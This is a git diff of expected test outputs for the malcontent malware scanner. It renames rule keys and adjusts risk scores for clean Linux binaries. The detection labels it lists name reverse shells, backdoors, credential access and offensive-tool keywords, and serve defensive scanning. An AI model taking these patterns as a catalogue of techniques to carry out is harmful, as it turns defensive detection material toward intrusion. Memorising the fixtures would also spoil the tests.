@@ -69,13 +72,11 @@ impact/exploit/known_s: medium
impact/exploit/overflow_shellcode: high
impact/infection/infected: medium
impact/infection/worm: medium
-impact/remote_access/backdoor: high
-impact/remote_access/botnet: medium
+impact/remote_access/backdoor: medium
impact/remote_access/iptables: medium
impact/remote_access/reverse_shell: high
impact/remote_access/trojan: medium
impact/rootkit: low
-impact/rootkit/refs: medium
lateral/scan/brute_force: low
net/dns/txt: low
net/download: medium
@@ -91,8 +92,6 @@ net/url/request: medium
os/kernel/seccomp: low
persist/daemon: medium
process/chroot: low
-process/name_get: medium
-process/parent_pid_get: low
sec-tool/net/masscan: high
sec-tool/net/nmap: medium
sec-tool/pentest/metasploit_ref: medium
diff --git a/tests/linux/clean/kuma-cp.simple b/tests/linux/clean/kuma-cp.simple
index ce32d7bad..34eb70185 100644
--- a/tests/linux/clean/kuma-cp.simple
+++ b/tests/linux/clean/kuma-cp.simple
@@ -3,7 +3,7 @@
3P/threat_hunting/privilegeescalation: medium
c2/addr/http_dynamic: medium
c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
c2/tool_transfer/download: medium
collect/archives/zip: medium
collect/databases/mysql: medium
@@ -33,16 +33,17 @@ discover/network/interface_list: medium
discover/network/mac_address: medium
discover/network/netstat: medium
discover/processes/list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/system/platform: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
evasion/bypass_security/linux/iptables: medium
evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
+evasion/file/prefix: medium
exec/cmd: medium
exec/conditional/LANG: low
exec/plugin: low
diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple
index ed8d10b80..d35fb32aa 100644
--- a/tests/linux/clean/ld-2.27.so.simple
+++ b/tests/linux/clean/ld-2.27.so.simple
@@ -1,6 +1,8 @@
# linux/clean/ld-2.27.so: medium
anti-behavior/LD_DEBUG: medium
anti-behavior/LD_PROFILE: medium
+discover/process/runtime_deps: medium
+discover/system/dev_full: low
evasion/hijack_execution/LD_LIBRARY_PATH: low
evasion/hijack_execution/etc_ld.so.preload: medium
fs/path/etc: low
@@ -9,8 +11,6 @@ fs/path/var_profile: medium
fs/proc/self_exe: medium
fs/proc/sys_kernel_osrelease: medium
fs/tempdir: low
-impact/exploit/GCONV_PATH: low
net/url/embedded: low
persist/shell/bash: medium
-process/thread_local_storage: low
sus/exclamation: medium
diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple
index 33fc594bd..b2dee9151 100644
--- a/tests/linux/clean/libgcj.so.17.0.0.simple
+++ b/tests/linux/clean/libgcj.so.17.0.0.simple
@@ -1,4 +1,4 @@
-# linux/clean/libgcj.so.17.0.0: high
+# linux/clean/libgcj.so.17.0.0: medium
3P/JPCERT/cobaltstrike_v3v4: medium
c2/addr/ip: medium
credential/password: low
@@ -18,8 +18,9 @@ data/hash/sha1: low
data/hash/sha256: low
data/hash/whirlpool: medium
discover/network/interface_list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/name: medium
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
@@ -50,7 +51,6 @@ fs/path/var: low
fs/permission/modify: medium
fs/proc/arbitrary_pid: medium
fs/proc/mounts: medium
-fs/proc/pid_exe: high
fs/proc/stat: medium
fs/tempdir: low
fs/tempdir/TEMP: low
@@ -82,7 +82,6 @@ net/url/embedded: low
net/url/encode: medium
net/url/parse: low
process/multithreaded: low
-process/name_get: medium
sus/exclamation: medium
sus/intercept: medium
sus/leetspeak: medium
diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple
index 475b6f7dd..86be6e324 100644
--- a/tests/linux/clean/libgcj.so.17.simple
+++ b/tests/linux/clean/libgcj.so.17.simple
@@ -1,4 +1,4 @@
-# linux/clean/libgcj.so.17: high
+# linux/clean/libgcj.so.17: medium
3P/JPCERT/cobaltstrike_v3v4: medium
c2/addr/ip: medium
credential/password: low
@@ -18,8 +18,9 @@ data/hash/sha1: low
data/hash/sha256: low
data/hash/whirlpool: medium
discover/network/interface_list: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/process/name: medium
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
@@ -50,7 +51,6 @@ fs/path/var: low
fs/permission/modify: medium
fs/proc/arbitrary_pid: medium
fs/proc/mounts: medium
-fs/proc/pid_exe: high
fs/proc/stat: medium
fs/tempdir: low
fs/tempdir/TEMP: low
@@ -82,7 +82,6 @@ net/url/embedded: low
net/url/encode: medium
net/url/parse: low
process/multithreaded: low
-process/name_get: medium
sus/exclamation: medium
sus/intercept: medium
sus/leetspeak: medium
diff --git a/tests/linux/clean/libsystemd.so.0.simple b/tests/linux/clean/libsystemd.so.0.simple
index 3800798c7..a45fb292c 100644
--- a/tests/linux/clean/libsystemd.so.0.simple
+++ b/tests/linux/clean/libsystemd.so.0.simple
@@ -1,8 +1,10 @@
# linux/clean/libsystemd.so.0: medium
data/compression/lzma: low
data/random/insecure: low
+discover/process/parent: low
+discover/process/runtime_deps: medium
discover/user/USER: low
-evasion/hidden_paths/var_run: medium
+evasion/file/location/var_run: medium
exec/program: medium
exec/shell/TERM: low
fs/file/copy: medium
@@ -36,6 +38,4 @@ process/groups_set: low
process/multithreaded: low
process/name_set: medium
process/namespace_set: low
-process/parent_pid_get: low
-process/thread_local_storage: low
process/userid_set: low
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index fe3d4731f..ab48ef8b6 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
@@ -1,11 +1,11 @@
## linux/clean/ls.x86_64 [🟡 MEDIUM]
-| RISK | KEY | DESCRIPTION | EVIDENCE |
-|--------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
-| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
-| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
-| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
-| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
+| RISK | KEY | DESCRIPTION | EVIDENCE |
+|--------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
+| LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) |
+| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) |
+| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) |
diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md
index c668064d7..ede252252 100644
--- a/tests/linux/clean/lslogins.md
+++ b/tests/linux/clean/lslogins.md
@@ -1,11 +1,11 @@
-## linux/clean/lslogins [🛑 HIGH]
+## linux/clean/lslogins [🟡 MEDIUM]
| RISK | KEY | DESCRIPTION | EVIDENCE |
|--------|--------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| HIGH | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) |
| MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
| MEDIUM | [evasion/logging/failed_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/failed_logins.yara#failed_logins) | accesses failed logins | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code) |
+| MEDIUM | [evasion/logging/historical_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/historical_logins.yara#login_records) | accesses historical login records | [/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code) |
| MEDIUM | [fs/path/home](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/home.yara#home_path) | references path within /home | [/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/Cellar/util-linux/2.40.2/share/locale](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2FCellar%2Futil-linux%2F2.40.2%2Fshare%2Flocale&type=code)
[/home/linuxbrew/.linuxbrew/lib/ld.so](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Flib%2Fld.so&type=code)
[/home/linuxbrew/.linuxbrew/opt/gcc/lib/gcc/current](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fgcc%2Flib%2Fgcc%2Fcurrent&type=code)
[/home/linuxbrew/.linuxbrew/opt/libxcrypt/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Flibxcrypt%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/ncurses/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fncurses%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/readline/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Freadline%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/sqlite/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fsqlite%2Flib&type=code)
[/home/linuxbrew/.linuxbrew/opt/zlib/lib](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew%2Fopt%2Fzlib%2Flib&type=code) |
| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./include](https://github.com/search?q=.%2Finclude&type=code) |
| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/](https://github.com/search?q=%2Ftmp%2F&type=code) |
diff --git a/tests/linux/clean/melange.simple b/tests/linux/clean/melange.simple
index a17f603f6..65688de3f 100644
--- a/tests/linux/clean/melange.simple
+++ b/tests/linux/clean/melange.simple
@@ -36,17 +36,18 @@ discover/network/interface_list: medium
discover/network/mac_address: medium
discover/network/netstat: medium
discover/processes/pgrep: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/location/system_directory: medium
+evasion/file/prefix: medium
evasion/hide_artifacts/pivot_root: medium
-evasion/hide_artifacts/system_directories: medium
exec/cmd: medium
exec/install_additional/pip_install: medium
exec/plugin: low
diff --git a/tests/linux/clean/misp_sample.ndjson.log.simple b/tests/linux/clean/misp_sample.ndjson.log.simple
index eedc03a76..2e8742a3d 100644
--- a/tests/linux/clean/misp_sample.ndjson.log.simple
+++ b/tests/linux/clean/misp_sample.ndjson.log.simple
@@ -1,12 +1,12 @@
-# linux/clean/misp_sample.ndjson.log: critical
+# linux/clean/misp_sample.ndjson.log: high
3P/threat_hunting/pastebin: medium
c2/addr/ip: medium
c2/tool_transfer/download: high
crypto/aes: low
+evasion/rootkit/refs: high
exec/shell/command: medium
false-positives/filebeat: low
impact/ransom/decryptor: medium
-impact/remote_access/backdoor: high
-impact/rootkit/refs: high
+impact/remote_access/backdoor: medium
net/url/embedded: medium
os/fd/multiplex: low
diff --git a/tests/linux/clean/mongosh.simple b/tests/linux/clean/mongosh.simple
index 0bf8f2dd6..a2450ed9f 100644
--- a/tests/linux/clean/mongosh.simple
+++ b/tests/linux/clean/mongosh.simple
@@ -4,9 +4,8 @@ anti-static/obfuscation/hex: medium
anti-static/obfuscation/obfuscate: low
c2/addr/http_dynamic: medium
c2/addr/ip: medium
-c2/addr/url: high
+c2/addr/server: medium
c2/discovery/ip_dns_resolver: medium
-c2/server_address: medium
collect/archives/unarchive: medium
collect/databases/postgresql: medium
collect/databases/sqlite: medium
@@ -37,18 +36,20 @@ data/random/insecure: low
discover/cloud/aws_metadata: low
discover/cloud/google_metadata: low
discover/group/lookup: medium
-discover/network/interface_get: low
+discover/network/interface: low
discover/network/interface_list: medium
discover/network/mac_address: medium
+discover/process/name: medium
+discover/process/parent: low
discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/info: medium
discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/cmd: medium
exec/conditional/LANG: low
@@ -160,9 +161,7 @@ process/create: low
process/groupid_set: low
process/groups_set: low
process/multithreaded: low
-process/name_get: medium
process/namespace_set: low
-process/parent_pid_get: low
process/terminate: medium
process/terminate/taskkill: medium
process/userid_set: low
diff --git a/tests/linux/clean/nvim.simple b/tests/linux/clean/nvim.simple
index 3f1bafa25..7d856fd17 100644
--- a/tests/linux/clean/nvim.simple
+++ b/tests/linux/clean/nvim.simple
@@ -1,7 +1,6 @@
# linux/clean/nvim: medium
3P/threat_hunting/hrshell: medium
c2/addr/server: medium
-c2/server_address: medium
collect/databases/mysql: medium
collect/databases/sqlite: medium
credential/cloud/aws: medium
@@ -16,8 +15,8 @@ discover/processes/pgrep: medium
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/x11: low
+evasion/file/location/x11_unix: low
+evasion/file/prefix: medium
exec/conditional/LANG: low
exec/dylib/symbol_address: medium
exec/plugin: low
diff --git a/tests/linux/clean/opa.simple b/tests/linux/clean/opa.simple
index 360cb7418..255d5ee87 100644
--- a/tests/linux/clean/opa.simple
+++ b/tests/linux/clean/opa.simple
@@ -22,8 +22,8 @@ data/encoding/json_encode: low
data/hash/md5: low
discover/cloud/aws_metadata: low
discover/cloud/google_metadata: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/USER: low
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index fd1071a42..27105d8cd 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -6,8 +6,8 @@
| MEDIUM | [3P/threat_hunting/keylogger](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#keylogger_keyword_offensive_tool_keyword) | [references 'keylogger keyword' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [KeyLogger](https://github.com/search?q=KeyLogger&type=code) |
| MEDIUM | [3P/threat_hunting/slowloris](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#SlowLoris_offensive_tool_keyword) | [references 'SlowLoris' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [Slowloris](https://github.com/search?q=Slowloris&type=code) |
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bindPort](https://github.com/search?q=bindPort&type=code)
[blIp](https://github.com/search?q=blIp&type=code)
[client_ip](https://github.com/search?q=client_ip&type=code)
[client_port](https://github.com/search?q=client_port&type=code)
[config_port](https://github.com/search?q=config_port&type=code)
[curlopt_port](https://github.com/search?q=curlopt_port&type=code)
[defaultPort](https://github.com/search?q=defaultPort&type=code)
[domain_port](https://github.com/search?q=domain_port&type=code)
[eIp](https://github.com/search?q=eIp&type=code)
[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)
[framed_ip](https://github.com/search?q=framed_ip&type=code)
[ftp_port](https://github.com/search?q=ftp_port&type=code)
[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)
[getPort](https://github.com/search?q=getPort&type=code)
[get_port](https://github.com/search?q=get_port&type=code)
[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)
[host_ip](https://github.com/search?q=host_ip&type=code)
[http_port](https://github.com/search?q=http_port&type=code)
[internal_ip](https://github.com/search?q=internal_ip&type=code)
[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)
[is_port](https://github.com/search?q=is_port&type=code)
[lat_port](https://github.com/search?q=lat_port&type=code)
[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)
[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[local_port](https://github.com/search?q=local_port&type=code)
[login_ip](https://github.com/search?q=login_ip&type=code)
[mIp](https://github.com/search?q=mIp&type=code)
[nas_ip](https://github.com/search?q=nas_ip&type=code)
[nas_port](https://github.com/search?q=nas_port&type=code)
[open_port](https://github.com/search?q=open_port&type=code)
[pg_port](https://github.com/search?q=pg_port&type=code)
[primary_ip](https://github.com/search?q=primary_ip&type=code)
[primary_port](https://github.com/search?q=primary_port&type=code)
[proxyPort](https://github.com/search?q=proxyPort&type=code)
[radius_port](https://github.com/search?q=radius_port&type=code)
[sam_port](https://github.com/search?q=sam_port&type=code)
[serverPort](https://github.com/search?q=serverPort&type=code)
[server_port](https://github.com/search?q=server_port&type=code)
[setPort](https://github.com/search?q=setPort&type=code)
[socketPort](https://github.com/search?q=socketPort&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[uriPort](https://github.com/search?q=uriPort&type=code)
[url_port](https://github.com/search?q=url_port&type=code)
[validate_ip](https://github.com/search?q=validate_ip&type=code)
[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)
[xIp](https://github.com/search?q=xIp&type=code) |
+| MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) |
| MEDIUM | [c2/discovery/dyndns](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/discovery/dyndns.yara#dynamic_dns_user) | dynamic dns user | [dyndns](https://github.com/search?q=dyndns&type=code) |
-| MEDIUM | [c2/server_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/server_address.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) |
| MEDIUM | [collect/archives/unarchive](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/unarchive.yara#unarchive) | unarchives files | [unarchived](https://github.com/search?q=unarchived&type=code) |
| MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [ZIP64](https://github.com/search?q=ZIP64&type=code) |
| MEDIUM | [collect/databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) |
@@ -20,8 +20,10 @@
| MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) |
| MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) |
| MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) |
+| MEDIUM | [discover/process/egid](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/egid.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) |
+| MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [CmdForListBodyStartCmd](https://github.com/search?q=CmdForListBodyStartCmd&type=code)
[SystemziProcess_runCommand1_closure](https://github.com/search?q=SystemziProcess_runCommand1_closure&type=code)
[SystemziProcess_runCommand1_info](https://github.com/search?q=SystemziProcess_runCommand1_info&type=code)
[SystemziProcess_runCommand2_closure](https://github.com/search?q=SystemziProcess_runCommand2_closure&type=code)
[SystemziProcess_runCommand3_bytes](https://github.com/search?q=SystemziProcess_runCommand3_bytes&type=code)
[SystemziProcess_runCommand_closure](https://github.com/search?q=SystemziProcess_runCommand_closure&type=code)
[SystemziProcess_runCommand_info](https://github.com/search?q=SystemziProcess_runCommand_info&type=code)
[execCommand](https://github.com/search?q=execCommand&type=code) |
| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
@@ -67,12 +69,10 @@
| MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) |
| MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) |
| MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) |
-| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/crontab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) |
+| MEDIUM | [persist/cron/tab](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/cron/tab.yara#crontab_support) | supports crontab manipulation | [crontab](https://github.com/search?q=crontab&type=code) |
| MEDIUM | [persist/kernel_module/module](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/kernel_module/module.yara#delete_module) | Unload Linux kernel module | [delete_module](https://github.com/search?q=delete_module&type=code) |
| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [PidFile](https://github.com/search?q=PidFile&type=code) |
| MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo](https://github.com/search?q=sudo&type=code) |
-| MEDIUM | [process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) |
-| MEDIUM | [process/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-get.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) |
| MEDIUM | [sec-tool/net/nmap](https://github.com/chainguard-dev/malcontent/blob/main/rules/sec-tool/net/nmap.yara#nmap) | nmap | [nmap](https://github.com/search?q=nmap&type=code) |
| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept](https://github.com/search?q=intercept&type=code) |
